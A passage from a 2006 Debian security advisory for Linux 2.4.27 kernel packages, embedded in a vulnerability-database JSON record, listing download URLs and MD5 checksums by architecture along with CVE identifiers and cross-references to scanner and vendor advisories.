http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297322 bd2931acac7b7e82b240031b76dbb2a0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2214 b0da0d519fee471f1445bcec8e1072c3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12025684 071b3edb763ba490c0101452d467c8a1\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1_i386.deb\n Size/MD5 checksum: 7765638 f8e51efba0f3cb10b658e01e12c6b9bb\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-386_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77860 2412ecaf415f28cedf1594fc5853a59d\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-386_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258984 1e42dac94e18a442204e159252730d5e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297106 adfdcbda85639abcd9d387baa6779ef1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2250 c1d2ec30560223773db6fb3fb5f68260\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 292582 4cc3a32beb6a18a7b8c97f0e174f7eb6\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12417806 4fbf262234903a4eac5f36b2a8a0b11e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2158 a83bda3df1131288d169b1c44d2f6f95\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477608 0dfded776cb25f87885f3e2cd54139fb\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k6_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77586 7a73742b7405143708835f3932f9fa70\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2198 53f3a8546c48f4872424f905cf7885b0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2248 130656ebcf35178df320c2f80ff446b3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298294 040778c609195abb76faf5dc6b2c4484\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2180 ed27ff9b477d3f06a89636ff63c1a608\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 286360 256a7cfba28e8f80e5ed1b36d463bbaa\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2198 73159b5fcca4e503e4e39d26d01f611b\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2152 bf549dc4754ad6432ec6a9133c288b55\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2182 32ef20edb04d84ae67b59ef74ca73c41\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2250 8fe3e928f92a4148cf5aef691717defd\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2226 11a3d9e97540823f189274cbf0964f40\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2268 eb19757eb174ca892c60b9ca003f6993\n http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 93990 ddf78ba3ee58f63c3ebb6ab2b686cbc9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 11709566 cc9d039b9cec5d5532023bffd1e13203\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7-smp_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77734 5e4b8007c196b17ee41776406b0b8230\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2178 a47be61afd7e8d4b63eaa0d5facec45c\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2176 cd6cfe3b2f4d398d759906817afafdf9\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-586tsc_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77604 c427abcb6f60c5bf1ac10bc19a65a8b8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12680486 1cb5b20b959b842df55c59a72278c084\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258980 ed75fb59949e2364abfc9459a4832fb3\n http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 56466 54f5cb20cca23c63adb22dacd6710641\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k6_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477594 429eb2dd9bec9b005332f8025849f378\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 303960 7163cde6ff6fb60f77c3be86b98c9ed9\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-headers-2.4.27-speakup_2.4.27-1.1sarge1_i386.deb\n Size/MD5 checksum: 4770342 c029fb318f3e99e16df3cc4431f48b06\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 300096 d72f151d92cd2b9e3b32247987bc9d77\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259296 a1674fac85b1dc7aaf4e43099bf6de5c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297542 e374488c0c43422a644ee1d8d5687f89\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 474438 5bad3d0b235b6dd4e13d1cd124dc0b8f\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2200 3641ec5e13ebe5cbf5713d7b6a9af77a\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77592 9655842dd75143b38d9591c05c069ac7\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686-smp_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77674 f068190e67295066533fb3fff111c814\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-build-2.4.27-3_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 8342 a1fe9c769945a7635ecc03b1e187e7fc\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7-smp_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259850 b623d22abc6f054d77b7a30917f08009\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77678 0a7beec37cd1bf7ec8f1731ae9d6bb9a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12086466 5af66657e22fdb6314119ea36a6c1c75\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2188 d2c285ee0c9bc108e0d4cd2e678bc6e0\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7-smp_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 484198 53b2e26c3a6892fe41301e31a8e91701\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298018 9d13a45679af6957abfc23b8878073c4\n http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 77968 bd243ceab2becfd668549358465abe69\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16976446 51987cad8f3f6eb3281ce356f736f90d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 17021738 57ead1bebe1a5f0eccc071e6a5f30f54\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4986 e10834d87d38a13a5c2ee5f13eed4d02\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 240590 4f512fc8f28e2a11cdd97569319d90f5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 240498 d4a0592c1014cd8d2d3b87ae052ff995\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4956 bd7812c913d7ea5ce87e8a249b8935af\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-3_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 5226 d74eb98006da5dab26589509ded5f29e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 239378 83101f13dbb75a77ff1a2685c1b59bfd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4992 7ba2aacc74bc4ac4370d2b6bf221e35a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4687006 1230148f08b0c17763e79b94986bc9bd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4972 bfd5bcd58354b443c53a13bb6708be37\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16621676 1bd285f8adedf710b1461724b0af8a61\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 239426 87381161e1e8d269ab82e51518cf79c4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16667452 ca44e47123ea32e0efe93bca7794de8c\n\n Motorola 680x0 architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme147_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2320966 4a15213792fd9ef48330cd67f767ab9d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-amiga_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2636422 ce2e589e3f58a53dcbbe362aa06bbdc0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme16x_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2394430 d0d19d564536a6640fe1401b91830a05\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-bvme6000_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2393560 c8afb24f7148596650c8140bdad7aa0a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-q40_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2260368 28858d5d8037969dddeed9eb787edae5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-atari_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2543228 6b5c2fdb57f7618bd884a56775fddea0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mac_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2475286 a6f7278b437e2c9f1efaf8230a7cf038\n\n Big endian MIPS architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-ip22_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 3848722 3cab75f38b72bff67ea0dae8239d2d8b\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-ip22_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 3847778 f250503d744408577b15430e62b73f28\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 7173140 99adeeb4f9a7ee12dbdd658311d4f641\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 4680422 75df59733690bc09bd5c854ab7cabfbd\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 18136 4ec345ef0b666b186646c2c209a9fda8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-lasat_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 2136150 2f180ceeeff353b1ac0e7a2a2869badc\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-cobalt_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4101818 b185a2cb8c1345d07c4f58f079c8abc8\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-xxs1500_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4668528 ce59d155e7f5de0b9512c8ae07e7d19f\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-kn04_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 2990238 2305898af4fbe07fb3b86a3658926b2a\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 18174 c5f6f20831a72ba867d251700636c30d\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r3k-kn02_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 3031148 0b84aa08bbd98a75b3c6e615dc78acd5\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 7037466 690116f5951c221bfbbe94838a1afe0d\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4685148 27568e054ecb5cfe22665cf3e4220d25\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 8722 fcfa53d79c741eb526efd83af6b77501\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4800060 9c3bc9afe4bde5642d352199bd6910bc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 1815364 531c6100c8a5ae8cd54a92c47935cacc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-small_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 12749452 d1460d74881e9dee0abe8f1e66edc940\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 8796 b29ec0ebb05f2980425452ff60efc78d\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 65486 0aa2289da231fdcca1311650e9a7ecd4\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 2496580 506d7979b6b2ec7fe1485f7bff41a7be\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-small_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153562 7d17ab040429b0802cbeb4a45ff4ed6a\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 13478332 65955c570b7d715dae51503d24248214\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 139374 14c07ada6bc05f9fdf9330d295ced263\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153260 16794e5cc21f355da1df4153744d2cdc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4692188 97f4f54124d47127aaad6b30b68fda7b\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-smp_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 13785186 9892ac04d3c9390c6a711a32af828152\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4682152 1f4e90348fe6a188a2360f57493c0516\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-smp_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153314 ae274ab60fad595683c4decfecdd12de\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 139174 7664ec4c4b8e49aad2271d8f9b91fa59\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390x_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1894 7c7d6ffff4091efa73369deb17b8c3a7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 2775998 6574681ce171f9a74f7565ea3f3ce3f1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1882 b2315be9f4c33a570f0da301890dd95d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390x_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 2967840 2ad64001085223fdd5f330bbbeb74e81\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-headers-2.4.27-3_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 4577766 84aa474690a106c530558c478aff3a93\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-headers-2.4-s390_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1900 1db72f0edc5d91d2e33521c672348378\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390-tape_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 992372 6c160c930e44a2e995d6db92ded45ce4\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32_42sarge2_sparc.deb\n Size/MD5 checksum: 2208 615b8dfc3a03f9e888299159ec75c56d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32-smp_42sarge2_sparc.deb\n Size/MD5 checksum: 2216 622f8ddd76acaf9328e54aeb86c85def\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64_42sarge2_sparc.deb\n Size/MD5 checksum: 2208 d186163b6921a0d8dee98401b2dc2396\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64-smp_42sarge2_sparc.deb\n Size/MD5 checksum: 2218 b9963b97417cc1e4f8c5ab0ce51e5bf2\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32_42sarge2_sparc.deb\n Size/MD5 checksum: 2184 a7d486f2c4a3c08a1aeb3b31351591d7\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32-smp_42sarge2_sparc.deb\n Size/MD5 checksum: 2198 7c0fec52b6b0ae094e68846451ce79ea\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64_42sarge2_sparc.deb\n Size/MD5 checksum: 2188 475e7a109600079559506774c5a822eb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64-smp_42sarge2_sparc.deb\n Size/MD5 checksum: 2200 3d1f9342a18271db94000bfeeebbd63a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 3785134 7ed118f20b7aa0065d8dc51c5f7015fc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 3598262 8077cc063a9638f64caa0b7501be6698\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 202410 925e828aac054961b71f4cb853a1a81d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 162680 8daeded3c5c21dadbc16fcb57e17ba0c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 201200 b8d59c4959f3641efe0825be35475b60\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-build-2.4.27-3_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 8358 6721b433e723689deff7a75c1a152436\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 6377516 987de05fb71c80488eac9f9fa0be3dab\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 6544548 60fe57c18de3491548b4d2bf1bf2ca9e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 164444 a4bbab66bcb9f637efb72ec48f4756c2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 2023602 04be2535bd4ea027a3167ae6aec300c2\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "published": "2006-04-05T00:00:00", "modified": "2006-04-05T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00105.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2004-1058", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3858", "CVE-2004-0887", "CVE-2005-4618", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-1761", "CVE-2005-2709", "CVE-2005-2973", "CVE-2004-2607", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-2555"], "type": "debian", "lastseen": "2019-05-30T02:21:32", "edition": 2, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-1018-1:7F47B", "DEBIAN:DSA-1017-1:CD473"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2006-0140.NASL", "REDHAT-RHSA-2006-0101.NASL", "SUSE_SA_2005_068.NASL", "CENTOS_RHSA-2006-0140.NASL", "UBUNTU_USN-231-1.NASL", "DEBIAN_DSA-1017.NASL", "REDHAT-RHSA-2006-0191.NASL", "CENTOS_RHSA-2006-0101.NASL", "DEBIAN_DSA-1018.NASL", "MANDRAKE_MDKSA-2006-018.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56471", "OPENVAS:136141256231065026", "OPENVAS:136141256231065553", "OPENVAS:65407", "OPENVAS:56533", "OPENVAS:65553", "OPENVAS:56469", "OPENVAS:136141256231065407", "OPENVAS:65026"]}, {"type": "cve", "idList": ["CVE-2005-3806", "CVE-2005-3783", "CVE-2005-3858", "CVE-2005-3257", "CVE-2004-0887", "CVE-2004-1058", "CVE-2005-4618", "CVE-2005-3857", "CVE-2005-2709", "CVE-2004-2607"]}, {"type": "ubuntu", "idList": ["USN-231-1", "USN-219-1", "USN-169-1"]}, {"type": "redhat", "idList": ["RHSA-2006:0101", "RHSA-2006:0191", "RHSA-2006:0140", 